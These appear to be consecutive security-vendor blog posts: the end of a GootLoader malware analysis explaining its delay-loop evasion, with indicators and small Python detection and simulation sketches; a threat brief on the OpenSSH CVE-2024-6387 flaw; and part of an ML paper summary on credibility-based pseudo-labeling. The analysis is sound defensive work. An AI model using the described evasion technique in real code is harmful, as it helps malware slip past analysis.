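Direct sleep calls are straightforward to find statically, which is part of why they are easy to detect. The sketch below scans JavaScript source for the two calls named above with a regular expression. It is a simplified illustration with hypothetical names, and it would not catch indirect or obfuscated calls.

```python
import re

# Matches direct calls to WScript.Sleep(...) or setTimeout(...), any letter case.
SLEEP_CALL = re.compile(r"\b(WScript\s*\.\s*Sleep|setTimeout)\s*\(", re.IGNORECASE)


def find_sleep_calls(js_source: str):
    """Return (line number, matched call name) for each direct sleep call."""
    results = []
    for match in SLEEP_CALL.finditer(js_source):
        # Line number = newlines before the match, plus one.
        line_no = js_source.count("\n", 0, match.start()) + 1
        results.append((line_no, match.group(1)))
    return results
```

A delay built from ordinary loop iterations contains neither call, so a scan like this returns nothing for it.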

Stepping Into the Code

In this section we leverage Node.js debugging in Visual Studio Code to analyze the following GootLoader file on a Windows host:

  • SHA256 hash: c853d91501111a873a027bd3b9b4dab9dd940e89fcfec51efbb6f0db0ba6687b
  • File size: 860,920 bytes
  • File name: what cards are legal in goat format 35435.js
  • First submitted to VirusTotal: Jan. 9, 2024

In our debugging endeavor for GootLoader files, we use a Windows host with Node.js JavaScript runtime and Visual Studio Code installed. In this environment, we can step through the code using Node.js debugging in the Visual Studio Code editor.

This environment offers an effective approach to comprehend the malware's flow control and execution logic. Typically, Windows Script Host (wscript.exe) runs standalone JavaScript files in a Windows environment. However, by employing Node.js and Visual Studio Code, we can step through the JavaScript file's execution, set breakpoints in the code and use the immediate window to evaluate expressions. While this approach offers significant advantages, certain JavaScript functions might not be supported by Node.js.

As an obfuscation technique, the authors of GootLoader have interwoven lines of GootLoader code among legitimate JavaScript library code. Throughout our debugging process, we observed code execution that appeared to be stuck within a particular loop. Below, Figure 2 shows a snippet of code from one of these loops.

The process of a Gootloader infection occurring on Wednesday, March 13, 2024, starting from a fake forum page, leading to a ZIP download link, which progresses to the downloading of a ZIP archive containing a JavaScript file, its installation, the creation of a persistent scheduled task, and finally resulting in web-based command and control (C2) traffic.
Figure 2. Code execution from a GootLoader sample that appeared to be stuck in a loop when analyzing the file using Node.js debugging in Visual Studio Code.

To gain a better understanding of these loops, let's delve into the surrounding code from the loop in Figure 2. Below, Figure 3 shows an isolated rendition of the original code that we will focus on.

A screenshot of a computer screen displaying a code snippet in a dark theme IDE. The code contains functions and variables in various colors such as purple, blue, and orange.
Figure 3. Code loop from Figure 2.

In Figure 3, the while loop in the code runs indefinitely, because the variable jobcv is always assigned the value 1. Additionally, the variable oftenfs acts as a counter, which is initialized with the value 8242.

The pivotal line within this loop is rangez=(horseq7[oftenfs](oftenfs));. The successful execution of this line relies on the function array horseq7 pointing to an actual function at the index oftenfs. The loop persists until the counter oftenfs reaches the value 2597242, at which point the function array horseq7 references the sleepy function.

This made the code appear to be stuck in a loop, because within our analysis environment, it took over 10 minutes for the counter oftenfs to attain the value 2597242.
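The delay mechanism described above can be approximated with a short Python simulation. This is only a sketch for illustration and not the sample's actual code: the names horseq7, sleepy and the counter values come from the analysis above, while run_delay_loop, its limit parameter and the placeholder function body are our own assumptions.

```python
# Illustrative simulation of a counter-driven delay loop.
# Names horseq7 and sleepy mirror the sample; everything else is hypothetical.

def run_delay_loop(start, dispatch, limit):
    """Increment a counter until it reaches an index that holds a function."""
    counter = start
    wasted_iterations = 0
    while counter <= limit:
        handler = dispatch.get(counter)
        if handler is not None:
            # The counter finally points at a real function, so call it.
            return handler(counter), wasted_iterations
        # Assumption: an index without a function is simply skipped here.
        # The analysis above does not show how the sample handles this case.
        counter += 1
        wasted_iterations += 1
    raise RuntimeError("no function found before the limit was reached")


def sleepy(counter):
    # Placeholder body. In the sample, this stage registers the next function.
    return f"sleepy reached at {counter}"


# Only one index in the "function array" holds a function.
horseq7 = {2597242: sleepy}

result, wasted = run_delay_loop(8242, horseq7, limit=3_000_000)
print(result)
print("iterations spent before the first useful call:", wasted)
```

Even in this simplified form, millions of iterations pass before any meaningful call is made, which is why the code looks stuck to an analyst stepping through it in a debugger.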

Next, we stepped into the sleepy function. Inside the sleepy function, we observed a familiar function array name from Figure 3. This function array, horseq7, is assigned a function named indicate6 as shown below in Figure 4.

A screenshot of code in an IDE, showing a function named "sleepy" with unusual variable names. Line 3802 highlights a line of code marked with a lightbulb emoji: horseq(5210044); = indicate6;'.
Figure 4. Finding the horseq7 function array name inside the sleepy function.

After more delays, code execution will land inside the indicate6 function. This time the lclft4 function is assigned to the function array horseq7 as shown below in Figure 5.

Screenshot of computer code in a text editor with syntax highlighting, displaying a function named 'indicate6' with three parameters and several lines of code assigning values to variables.
Figure 5. Inside the indicate6 function.

Again with more delays, code execution will reach the course83 function shown below in Figure 6. The function course83 is where the actual malicious code begins execution.

Close-up of a computer screen displaying lines of code in a programming environment. Specific code functions are visible, such as "courses3" and assignments like "horseq7 = camel;". The syntax includes both text and parentheses, highlighting variables and functions.
Figure 6. Inside the course83 function.

Finally, debugging the course83 function unveils and deobfuscates JavaScript code that initiates GootLoader's malicious functions. Below, Figure 7 shows a section of the deobfuscated malicious GootLoader code.

A code editor with many lines of script written in a programming language. The code snippets include functions, condition checks, and variables relating to managing tasks within a computer system. The background of the screen is dark with text highlighted in blue, yellow, and white for clarity.
Figure 7. Snippet of deobfuscated malicious GootLoader code.

The creators of GootLoader employed time-consuming while loops with arrays of functions to deliberately delay the execution of malicious code. This method effectively implements an evasion technique, inducing sleep periods to obfuscate the malicious nature of GootLoader.

Table 1 lists the counter values and their assigned functions in the order they were called from the GootLoader JavaScript code.

Counter Value Function Name
2597242 sleepy
5210044 indicate6
6001779 lclft4
6690534 course83

Table 1. Counter values and their assigned functions from the GootLoader sample.

Conclusion

Leveraging our insights gained from analyzing the evasion technique used by GootLoader, we can enhance our ability to detect, analyze and develop effective countermeasures against malicious software. Through continuous collaboration and knowledge sharing, we can collectively stay ahead of cybercriminals to help safeguard our digital systems and networks.

Palo Alto Networks customers are better protected from GootLoader and similar threats through the following products:

If you think you might have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Indicators of Compromise

SHA256 Hashes of GootLoader JavaScript Files

  • b939ec9447140804710f0ce2a7d33ec89f758ff8e7caab6ee38fe2446e3ac988
  • c853d91501111a873a027bd3b9b4dab9dd940e89fcfec51efbb6f0db0ba6687b

Threat Brief: CVE-2024-6387 OpenSSH RegreSSHion Vulnerability

Executive Summary

On July 1, 2024, a critical signal handler race condition vulnerability was disclosed in OpenSSH servers (sshd) on glibc-based Linux systems. This vulnerability, called RegreSSHion and tracked as CVE-2024-6387, can result in unauthenticated remote code execution (RCE) with root privileges. This vulnerability has been rated High severity (CVSS 8.1).

This vulnerability impacts the following OpenSSH server versions:

  • OpenSSH versions from 8.5p1 up to, but not including, 9.8p1
  • OpenSSH versions earlier than 4.4p1, if they have not been backport-patched against CVE-2006-5051 or patched against CVE-2008-4109

The SSH features in PAN-OS are not affected by CVE-2024-6387.

Using Palo Alto Networks Xpanse data, we observed 23 million instances of OpenSSH servers including all versions. We saw over 7 million exposed instances of OpenSSH versions 8.5p1-9.7p1 globally as of July 1, 2024. Including older versions (4.3p1 and earlier), we see 7.3 million total. However, this is likely to be an overcount of vulnerable versions as there is no reliable way to account for backporting, in which instances are running patched versions but displaying impacted version numbers. These numbers also do not account for OS-level specifications or configurations that could be required for the vulnerability.

While there is PoC code for this vulnerability, there is no known activity in the wild as of July 2, 2024. Our testing of this code suggests it is not functional. We have been unable to successfully exploit the CVE-2024-6387 vulnerability with this PoC to achieve remote code execution.

Palo Alto Networks also recommends updating all OpenSSH instances to the latest version of OpenSSH, v9.8p1 or later.

Palo Alto Networks customers receive protections from and mitigations for CVE-2024-6387 in the following ways:

The Unit 42 Incident Response team can also be engaged to help with a compromise or to provide a proactive assessment to lower your risk.

Palo Alto Networks customers are better protected from vulnerabilities discussed in this article through Cortex XSOAR, XDR and XSIAM. Customers are also better protected through our Next-Generation Firewall with Cloud-Delivered Security Services, including Advanced WildFire. Customers can access external SSH exposure detection from Cortex Xpanse and XSIAM. Customers are also better protected by Prisma Cloud through tooling such as Prisma Cloud’s agent or agentless vulnerability scanning and Software Composition Analysis (SCA) tools, which assist in identifying vulnerable resources across the cloud development lifecycle.

Vulnerabilities Discussed CVE-2024-6387

Details of the Vulnerability

Researchers at Qualys discovered that the OpenSSH server process sshd is vulnerable to a signal handler race condition, enabling unauthenticated remote code execution with root privileges on glibc-based Linux systems in its default configuration. OpenSSH is an open-source suite of tools for remote sign-in and data transfer, using the Secure Shell (SSH) protocol.

This vulnerability can be exploited remotely on glibc-based Linux systems due to syslog() calling async-signal-unsafe functions like malloc() and free(), leading to unauthenticated remote code execution as root.

This occurs because sshd's privileged code is not sandboxed and runs with full privileges. OpenBSD is not vulnerable because its signal alarm (SIGALRM) handler uses syslog_r(), an async-signal-safe version of syslog().

Table 1 shows the vulnerable versions associated with CVE-2024-6387.

Version Vulnerability Determination
OpenSSH < 4.4p1 YES (NO if backport-patched against CVE-2006-5051 and CVE-2008-4109)
4.4p1 <= OpenSSH < 8.5p1 NO
8.5p1 <= OpenSSH < 9.8p1 YES

Table 1. Breakdown of vulnerable OpenSSH versions associated with CVE-2024-6387.
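The ranges in Table 1 can be expressed as a small version check. The following Python sketch is one possible way to do so. The function names and the legacy_backports_applied flag are hypothetical, and a version string alone cannot reveal whether a distribution has backported the fix, so a positive result only means the version number falls in an affected range.

```python
import re


def parse_openssh_version(text):
    """Turn a string such as '8.5p1' into a comparable tuple (8, 5, 0, 1)."""
    match = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:p(\d+))?", text.strip())
    if match is None:
        raise ValueError(f"unrecognized OpenSSH version: {text!r}")
    # Missing components (for example, no patch level) are treated as 0.
    return tuple(int(group) if group else 0 for group in match.groups())


def is_version_in_affected_range(text, legacy_backports_applied=False):
    """Apply the ranges from Table 1 to a reported version string.

    legacy_backports_applied is a hypothetical flag stating that a pre-4.4p1
    build carries the patches for CVE-2006-5051 and CVE-2008-4109.
    """
    version = parse_openssh_version(text)
    if version < parse_openssh_version("4.4p1"):
        return not legacy_backports_applied
    if version < parse_openssh_version("8.5p1"):
        return False
    return version < parse_openssh_version("9.8p1")


for candidate in ["4.3p1", "7.4p1", "8.5p1", "9.7p1", "9.8p1"]:
    print(candidate, is_version_in_affected_range(candidate))
```

Comparing parsed tuples rather than raw strings avoids ordering mistakes such as treating 8.10 as older than 8.5.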

According to OpenSSH’s release notes on July 1, 2024, successful exploitation has been shown on 32-bit Linux/glibc systems with address space layout randomization (ASLR). Under lab conditions, exploitation typically requires 6-8 hours of continuous connections, up to the maximum number the server will accept.

A public PoC for CVE-2024-6387 was committed to the repository of GitHub user zgzhang by user 7etsuo on July 1, 2024. We have been unable to successfully exploit the CVE-2024-6387 vulnerability with this PoC to achieve remote code execution in our testing environment.

Using Palo Alto Networks Xpanse data, we observed 23 million instances of OpenSSH servers including all versions. We saw over 7 million exposed instances of OpenSSH versions 8.5p1-9.7p1 globally as of July 1, 2024. Including older versions (4.3p1 and earlier), we see 7.3 million total. However, this is likely to be an overcount of vulnerable versions as there is no reliable way to account for backporting, in which instances are running patched versions but displaying impacted version numbers. These numbers also do not account for OS-level specifications or configurations that could be required for the vulnerability.

Table 2 shows the geographic distribution of our observations of vulnerable versions 8.5p1-9.7p1.

Country Unique IP Addresses
United States 2,173,896
Germany 905,859
China 435,490
Singapore 296,226
Russia 275,197
The Netherlands 261,212
France 248,153
United Kingdom 237,329
India 230,320
Japan 227,663
Korea 136,852
Canada 119,924
Finland 110,516
Hong Kong 103,685
Australia 100,780

Table 2. Top 15 Countries Exposed to CVE-2024-6387 as of July 1, 2024.

Current Scope of the Attack

While there is PoC code for this vulnerability, there is no known activity in the wild as of July 2, 2024. Our testing of this code suggests it is not functional in our testing environment. We have been unable to successfully exploit the CVE-2024-6387 vulnerability with this PoC to achieve remote code execution.

Interim Guidance

Palo Alto Networks recommends updating all OpenSSH instances to the latest version of OpenSSH, v9.8p1 or later.

Prisma Cloud detects the presence of any cloud resource that is vulnerable to CVE-2024-6387 as shown in Figure 1, including VM, serverless, container resources and cloud image repositories.

Screenshot of a "CVE Viewer" in Prisma Cloud, displaying a search bar with the text "CVE-2024-6387" entered, and search results showing columns for CVE, Product, Date, Review, Severity, Affected Version, and Fix Date. The columns for Product, Date, Review, and Fix date are empty, while the Severity column lists "High."
Figure 1. Prisma Cloud vulnerability detection status.

Prisma Cloud customers can query their cloud environments for cloud resources that contain the CVE-2024-6387 vulnerability that are also internet accessible, as shown in Figure 2.

Screenshot of a digital interface for searching vulnerabilities with a focus on a specific CVE ID. Features include a search bar labeled "INVESTIGATE," buttons for "Background Jobs" and a query library, and a section to hide or display the search query. The main display shows a highlighted CVE ID, "CVE-2024-6387," in the process of being added for investigation focused on the term "Vulnerability."
Figure 2. Prisma Cloud investigation for CVE-2024-6387.

If instances of the RegreSSHion vulnerability are found within cloud resources, they should be updated to the latest version of OpenSSH and an investigation should be started to ensure no malicious connections were established with the vulnerable cloud resources.

Unit 42 Managed Threat Hunting Queries

The Unit 42 Managed Threat Hunting team continues to monitor any developments related to the exploitation of this CVE. Cortex XDR customers can use the XQL query below to identify hosts running an affected version of OpenSSH.

Conclusion

CVE-2024-6387 (aka RegreSSHion) is a signal handler race condition vulnerability in OpenSSH servers (sshd) on glibc-based Linux systems. This vulnerability is rated High severity (CVSS 8.1), and can result in unauthenticated remote code execution (RCE) with root privileges.

This vulnerability impacts all OpenSSH server versions from 8.5p1 up to, but not including, 9.8p1, as well as versions earlier than 4.4p1 if they have not been backport-patched against CVE-2006-5051 or patched against CVE-2008-4109. The SSH features in PAN-OS are not affected by CVE-2024-6387.

While there is PoC code for this vulnerability, there is no known activity in the wild as of July 2, 2024. Our testing of this code suggests it is not functional in our testing environment. We have been unable to successfully exploit the CVE-2024-6387 vulnerability with this PoC to achieve remote code execution.

Palo Alto Networks Product Protections for CVE-2024-6387

Palo Alto Networks customers can leverage a variety of product protections and updates to identify and defend against this threat.

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Cortex XSOAR

Cortex XSOAR has released a response pack and playbook for CVE-2024-6387 to help automate and expedite the mitigation process. This playbook automates the following tasks: It begins by collecting, extracting, and enriching indicators. It then searches for vulnerable endpoints using Prisma Cloud and Cortex XDR XQL queries. If vulnerable endpoints are found, there is an option to send a notification email.

Finally, during the mitigation phase, the user is promptly notified with the official OpenSSH CVE-2024-6387 patch and Unit 42 mitigation recommendations.

CVE-2024-6387_-_OpenSSH_RegreSSHion_RCE
Figure 3. Flowchart from Cortex Playbook for CVE-2024-6387.

Cortex XDR and XSIAM

The Cortex XDR and XSIAM agent has multiple layers of defense protecting our customers from activities that might be performed by exploiting this vulnerability. These include the Exploit Prevention, Local AI analysis, WildFire, Behavioral Threat Protection (BTP), and Reverse Shell Protection modules that stop malicious activity such as this at first sight.

Thanks to our multi-layer security approach, we have different capabilities in place to prevent those activities, such as Behavioral Threat Protection (BTP), Advanced WildFire (AWF), Local Analysis (LA) and Reverse Shell Protection.

Cortex Xpanse

Cortex Xpanse has the ability to identify exposed vulnerable OpenSSH devices on the public internet and escalate these findings to defenders. Customers can enable alerting on this risk by ensuring that the Insecure OpenSSH Attack Surface Rule is enabled. Identified findings can either be viewed in the Threat Response Center or in the incident view of Expander. These findings are also available for Cortex XSIAM customers who have purchased the ASM module. Cortex Xpanse and XSIAM also have the ability to automatically mitigate vulnerable exposed OpenSSH servers.

Prisma Cloud

Prisma Cloud has detection capabilities in place for CVE-2024-6387. Prevention capabilities also exist with Prisma Cloud Agent and Agentless vulnerability scanning. Additionally, Prisma Cloud Software Composition Analysis (SCA) can detect vulnerable cloud resources throughout the cloud development lifecycle, including within cloud image repositories.

Additional Resources

Updated July 3, 2024, at 7:04 a.m. PT to make a small update to the protections information for Cortex XDR and XSIAM. 

Updated July 2, 2024, at 4:20 p.m. PT to adjust for consistency and update protections information for Cortex XDR and XSIAM. 

Updated July 2, 2024, at 1:52 p.m. PT to add product protections information for Cortex XSOAR. 

Updated July 8, 2024, at 2:43 p.m. PT to add Figure 3. 

Updated July 10, 2024, at 3:11 p.m. PT to update the Cortex XSOAR information. 

The Contrastive Credibility Propagation Algorithm in Action: Improving ML-powered Data Loss Prevention

Executive Summary

The Contrastive Credibility Propagation (CCP) algorithm is a novel approach to semi-supervised learning (SSL) developed by AI researchers at Palo Alto Networks to improve model task performance with imbalanced and noisy labeled and unlabeled data. This post is based on our paper, published and presented at The 38th Annual AAAI Conference on Artificial Intelligence (AAAI ‘24). The paper shows that CCP expands robustness to five different data quality issues often found in real-world datasets compared to several state-of-the-art SSL algorithms.

This research better supports practitioners building classifiers with these kinds of datasets. This can help unlock the usefulness of unlabeled data, which is often more abundant and task-relevant but may be too messy for existing methods, many of which have only been demonstrated to work on clean datasets.

In addition to summarizing the paper at a high level, we illustrate an example of applying CCP to the critical cybersecurity task of machine learning (ML) powered data loss prevention (DLP). DLP is well suited to demonstrate CCP’s unique benefits as real-world DLP traffic is noisy and unviewable due to privacy concerns. Specifically, we focus on building an ML classifier to differentiate sensitive versus non-sensitive text documents. The model also identifies what kind of sensitive data is contained in a sensitive document (e.g., medical information, financial accounting documents, lawsuit proceedings, or source code). We explain how to apply CCP to a DLP deep neural network (DNN) classifier. This is followed by demonstrating the overarching goal of reducing the loss of classification accuracy when moving from a curated test set to real-world data.

Palo Alto Networks customers are better protected from the threats discussed in the above research through our Cloud-Delivered Enterprise DLP product.

Related Unit 42 Topics Machine Learning

Introduction to CCP

Research Question

SSL leverages both labeled and unlabeled data to train a single model. Often, people use SSL to build a classifier (i.e., a model that decides for each sample what class it belongs to from a predefined set of classes).

In this context, a labeled sample means we know in advance what class that sample belongs to, and unlabeled means we do not. However, we can often still extract useful information from the unlabeled data to build a better classifier as indicated in Figure 1. That is what SSL algorithms are designed to do.

Image 1 is a diagram of the trained model with additional data that is unlabeled. From left to right: DNN plus labeled data plus unlabeled data, greater than symbol, DNN plus labeled data. Question mark.
Figure 1. Ideally, a model trained with additional unlabeled data should outperform a model trained only with labeled data.

However, it’s not uncommon for a model trained with SSL to perform worse than one trained only on labeled data (i.e., fully supervised).

Image 2 is a diagram of the SSL workflow. On the left is the training zone. On the right is the inference zone. On the left: zone Image of the Earth. Two arrows point from it: one to a container of labeled data in the training zone. one to a container of unlabeled data in the training and inference zone. An arrow from both the labeled and unlabeled data containers point to DNN in the training zone. Between them is a does not equal symbol and a question mark. A second arrow leading from the unlabeled data leads into the inference zone and points to a second DNN marker, and an arrow leads from that to Verdicts.
Figure 2. A typical SSL workflow. The labeled and unlabeled datasets are often sourced from distinct distributions.

As illustrated in Figure 2, a common reason for this is that the labeled and unlabeled datasets often have distinct properties. They are often sampled from different sources (i.e., distributions).

For example, labeled datasets are typically collected manually offline by practitioners and annotators. Unlabeled data, on the other hand, typically comes from the same source you wish to deploy your model on in the real world.

One of the core motivations of SSL is aligning models to real-world distributions that are too plentiful or messy to label. Curated labeled datasets often take on distinct characteristics from unlabeled data.

By the nature of being unlabeled, the relative frequency of classes in real-world data is typically unknown or even unknowable. Sometimes, unlabeled data is unviewable due to privacy concerns or in the deployment of fully autonomous systems.

More examples of data quality issues are as follows:

  • Concept drift within classes (e.g., change in the prototypical example of a class)
  • Unlabeled data containing data that belongs to no class
  • Errors in the given labels

SSL algorithms are seldom equipped to handle these quality issues, especially combinations thereof. In literature, this often goes unnoticed as, in many works, the sole experimental variable is the number of labels given on otherwise clean and balanced academic datasets.

Our research question is this: can we build an SSL algorithm whose primary objective is to match or outperform a fully supervised baseline for any dataset?

Core Algorithm Components

SSL comes in many flavors. A common, powerful approach is to generate and leverage what are known as pseudo-labels for unlabeled data during training. As illustrated in Figure 3, pseudo-labels are (often soft) labels produced dynamically for unlabeled data during training that are then used as new supervision sources for further training.

In the best-case scenario, if all pseudo-labels are correct, training with them can be as powerful as if all the unlabeled data were labeled. This is, of course, unrealistic.

It's common for the true class of unlabeled data to be indiscernible from the given label information. This means pseudo-labels will inevitably have errors, which is why pseudo-label approaches are also inherently dangerous. SSL algorithms, especially those implemented with deep neural networks, tend to be very sensitive to these errors in pseudo-supervision.

Image 3 is a graph of batches of data represented by circles. Red circles are Class 1 labeled data. Blue circles are Class 2 labeled data. Circles with red or blue outlines are pseudo labeled. Circles with a black outline are unlabeled. Arrows from the labeled classes point to some of the pseudo-labeled class circles.
Figure 3. Pseudo-labels (faint outlines) are produced for unlabeled samples in a batch of data. The pseudo-labels for the two remaining unlabeled samples are more ambiguous.

To approach our research question, we start with a simple assumption: pseudo-label errors are the root cause of SSL algorithms failing to match or outperform a fully supervised baseline. Intuitively, without those errors, an algorithm should have no issue at least matching the fully supervised baseline.

CCP is designed around this principle. Specifically, we aim to build an SSL algorithm that is foremost robust to the pseudo-label errors that it inevitably produces.

Iterative Pseudo-label Refinement

Learning with noisy labels is a rich field of research. For CCP, we draw inspiration from prior works in this space.

There is an important distinction between class-conditional label noise and instance-dependent label noise. Instance-dependent label noise refers to the type of noise where the probability of label errors depends on the specific characteristics (features) of the instance.

Class-conditional label noise, on the other hand, refers to label errors that are dependent on the true label. Pseudo-label noise is highly instance-dependent as each pseudo-label is generated dynamically on a sample-by-sample basis. This narrows down our search further.

A powerful method previously demonstrated on fully supervised problems is called self-evolution average label, also known as SEAL. The main idea is to train a model with noisy labels and to produce new predictions for every data sample multiple times throughout the training process. You then average those predictions together to produce the set of labels you’ll use in the next iteration. This works because, in the presence of an incorrect label, your model will often oscillate its prediction between the correct and incorrect class before it typically memorizes the incorrect class late in training.

Averaging those predictions across time slowly pushes the label in the right direction. A similar pattern in pseudo-label oscillations was observed in our study. An example of pseudo-label oscillation is shown in Figure 4.
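The averaging step can be illustrated with a few lines of Python. This is a minimal sketch of the idea only, not the SEAL or CCP implementation: the function name average_predictions and the prediction scores below are hypothetical values chosen to mimic a sample whose given label (class 1) is wrong.

```python
def average_predictions(prediction_history):
    """Average the per-class scores of one sample across training checkpoints."""
    num_checkpoints = len(prediction_history)
    num_classes = len(prediction_history[0])
    return [
        sum(scores[k] for scores in prediction_history) / num_checkpoints
        for k in range(num_classes)
    ]


# Hypothetical scores [class 0, class 1] recorded at four points in training.
# Early on, the model favors the true class 0. Late in training, it has
# started to memorize the incorrect given label, class 1.
history = [
    [0.80, 0.20],
    [0.70, 0.30],
    [0.60, 0.40],
    [0.30, 0.70],
]

refined = average_predictions(history)
print("last prediction:", history[-1])
print("averaged label: ", refined)
```

In this toy example, the final prediction alone would point to the wrong class, while the average across checkpoints still favors the class the model preferred for most of training.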

Image 4 is a graph of predictions of the pseudo-labeled classes. Both the blue and the green line denote the class 1 score which changes over time.
Figure 4. Pseudo-label predictions oscillate between classes throughout training. The blue (green) line depicts the score for class 1 (0). Source: Palo Alto Networks, AI Research.

Early in training, when the model has not overfitted to the wrong label, the score for the true class is high. This is reversed when the model has time to fit itself to the wrong label.

CCP features an outer loop designed to exploit this phenomenon, illustrated in Figure 5. For every batch of data during training, we predict new pseudo-labels for unlabeled data, then average them together to mark the end of an iteration.

Image 5 is the CCP algorithm. The purple zone at the top is the initialization. The cream zone below it is the CCP iteration. Between these zones is when the pseudo labels are replaced and the classifier training happens. The CCP iteration zone includes equations for averaging, scaling, credibility, and clipping.
Figure 5. High-level view of the CCP algorithm. An outer loop iteratively refines a set of pseudo-labels (expressed as credibility vectors) before they are used to build a classifier. Source: Palo Alto Networks, AI Research.

These “CCP iterations,” designed to refine pseudo-labels iteratively, take place strictly before a classifier is ever built. The pseudo-labels are generated transductively, meaning we infer each sample based only on other samples in the batch.

Classifiers are inductive and try to learn generalizable patterns across all data. Importantly, these noisy, batch-level, transductive pseudo-labels are never directly used to supervise our inductive classifier. We clean the pseudo-labels through iterative refinement first.

Credibility Representations

As mentioned previously, it's common for the true class of unlabeled data to be indiscernible from the given label data. This may be due to ambiguity or gaps in the label information.

We’d ideally like to discard pseudo-label information for those samples or otherwise nullify their impact on learning. We adopt a label representation called “credibility vectors” that allows us to do the former.

Traditionally, label vectors are computed via a softmax function. This function transforms a vector of real values (class scores or similarities) into a vector of values all in the range [0, 1] that sums to 1 such that they can be interpreted as probabilities.

The function preserves the ranking of values (i.e., small input values will correspond to small output values and vice versa). Credibility transforms an input vector of class scores/similarities with range [0, 1] into an output vector with range [-1, 1].

In a credibility vector, -1 corresponds to high confidence in class dissimilarity, 0 corresponds to no confidence either way and 1 corresponds to high confidence in class similarity. The core idea of credibility is to condition class similarity measurements on the next highest class similarity (i.e., a large class similarity measure only remains high if no other class similarity measures are also large).

Consider the example in Figure 6.

Image 6 is a formula (left) paired with a graph (right). The graph includes the red and blue classes represented mathematically as the vector and two labels. On the right is the graph of the cross-entropy classification loss and its gradient. The red line represents the softmax. The blue line represents the credibility. While the blue line flows in one straight right from left to right, the red line forms the shape of a U on the topmost portion of the graph above 0.
Figure 6. Left: An unlabeled sample is nearly equally similar to the red and blue classes. From top to bottom: the similarity vector, a softmax label and a credibility label. Right: Cross-entropy classification loss and its gradient when supervised with the softmax (red) and credibility labels (blue). Source: modified from Palo Alto Networks, AI Research.

On the left of Figure 6, we see an unlabeled sample with large class similarity scores of 0.98 and 0.99 to the red and blue classes, respectively. The true label is nearly ambiguous. The softmax label is computed as [0.502,0.498]. The credibility vector is computed as 0.99-0.98=0.01 in the first entry and 0.98-0.99=-0.01 in the second entry (which is clipped to 0).
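The numbers in this example can be reproduced with a short Python sketch. It assumes, based on the description above, that the credibility of a class is its similarity minus the largest similarity among the other classes, with negative values optionally clipped to 0. The function names are ours, and the input order [0.99, 0.98] is chosen so the outputs line up with the entries quoted above.

```python
import math


def softmax(scores):
    """Standard softmax: outputs lie in [0, 1] and sum to 1."""
    highest = max(scores)
    exps = [math.exp(s - highest) for s in scores]  # shift for numerical stability
    total = sum(exps)
    return [e / total for e in exps]


def credibility(similarities, clip=True):
    """Condition each class similarity on the strongest competing class.

    Assumption: credibility_k = similarity_k - max(similarity_j for j != k).
    Requires at least two classes. With clip=True, negatives become 0.
    """
    result = []
    for k, value in enumerate(similarities):
        strongest_other = max(v for j, v in enumerate(similarities) if j != k)
        difference = value - strongest_other
        result.append(max(difference, 0.0) if clip else difference)
    return result


similarities = [0.99, 0.98]
print("softmax label:    ", [round(v, 3) for v in softmax(similarities)])
print("credibility label:", [round(v, 3) for v in credibility(similarities)])
print("unclipped:        ", [round(v, 3) for v in credibility(similarities, clip=False)])
```

A softmax label must always distribute a total mass of 1 across classes, so it cannot express "no confidence either way." The credibility label shrinks toward the zero vector as the top two similarities approach each other.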

In SSL, these pseudo-labels are often used to supervise an underlying model with a classification loss. We can see the effect of using each on the standard classification loss function called cross-entropy (Xent) on the right of Figure 6.

In that plot, consider the X-axis the softmax output of a binary classifier for the blue class. Computing cross-entropy with the softmax label induces a strong gradient at either pole despite the true class being nearly ambiguous.

Using the credibility label will ensure the gradient for this sample is near 0 everywhere except close to x=0. Where all classes are equally similar, the credibility label would be the zero vector and the gradient would be zero everywhere. This representational capacity is important because we often observe incorrect pseudo-labels improving through CCP iterations, sometimes just by shrinking in magnitude (e.g., when the true class is indiscernible).
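To make the gradient behavior concrete, the following Python sketch evaluates the cross-entropy gradient for the two labels from the Figure 6 example. It is a simplified illustration under our own assumptions: the classifier output is written as [x, 1 - x], where x is the score for the first label entry, and the function names are hypothetical.

```python
import math


def cross_entropy(label, x):
    """Cross-entropy between a two-entry soft label and the prediction [x, 1 - x]."""
    return -(label[0] * math.log(x) + label[1] * math.log(1.0 - x))


def cross_entropy_gradient(label, x):
    """Derivative of the loss above with respect to x."""
    return -label[0] / x + label[1] / (1.0 - x)


softmax_label = [0.502, 0.498]      # values quoted in the example above
credibility_label = [0.01, 0.0]     # values quoted in the example above

for x in [0.01, 0.25, 0.50, 0.75, 0.99]:
    g_soft = cross_entropy_gradient(softmax_label, x)
    g_cred = cross_entropy_gradient(credibility_label, x)
    print(f"x={x:.2f}  softmax gradient={g_soft:9.3f}  credibility gradient={g_cred:9.3f}")
```

With the softmax label, the gradient grows large in magnitude as x approaches either 0 or 1, pushing the model hard even though the sample is nearly ambiguous. With the credibility label, the gradient stays small across the range and only grows as x approaches 0.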

In an ablation analysis in Figure 7, we see a key benefit of credibility representations is differentiating correct versus incorrect pseudo-labels. On average, the strength (maximum value) difference between correct and incorrect pseudo-labels is much greater when using credibility. This is likely due to its more strict criteria for assigning large scores. It is thus a better measure of confidence.

The entire CCP framework, from pseudo-label refinement to classifier building, makes native use of credibility and the better differentiation it provides. Through weighted averages, a sample’s impact on label propagation and all loss functions scales linearly with the magnitude of the single non-zero entry of a credibility label. Zero vectors also provide a natural initialization for pseudo-labels in the first CCP iteration.

Image 7 is a graph of the average strength of the correct credibility pseudo labels (solid green line), the incorrect credibility pseudo labels (red line), the correct softmax pseudo labels (dashed green line) and the incorrect softmax pseudo labels (dashed red line).
Figure 7. A representative example of the average strength of correct and incorrect pseudo-labels when using softmax and credibility.

Subsampling

Figure 7 suggests that the strength of credibility labels is effective at identifying pseudo-labels that are incorrect. Naturally, one may ask if we can use this signal to refine the pseudo-labels during CCP iterations further. We define a subsampling procedure that does just this.

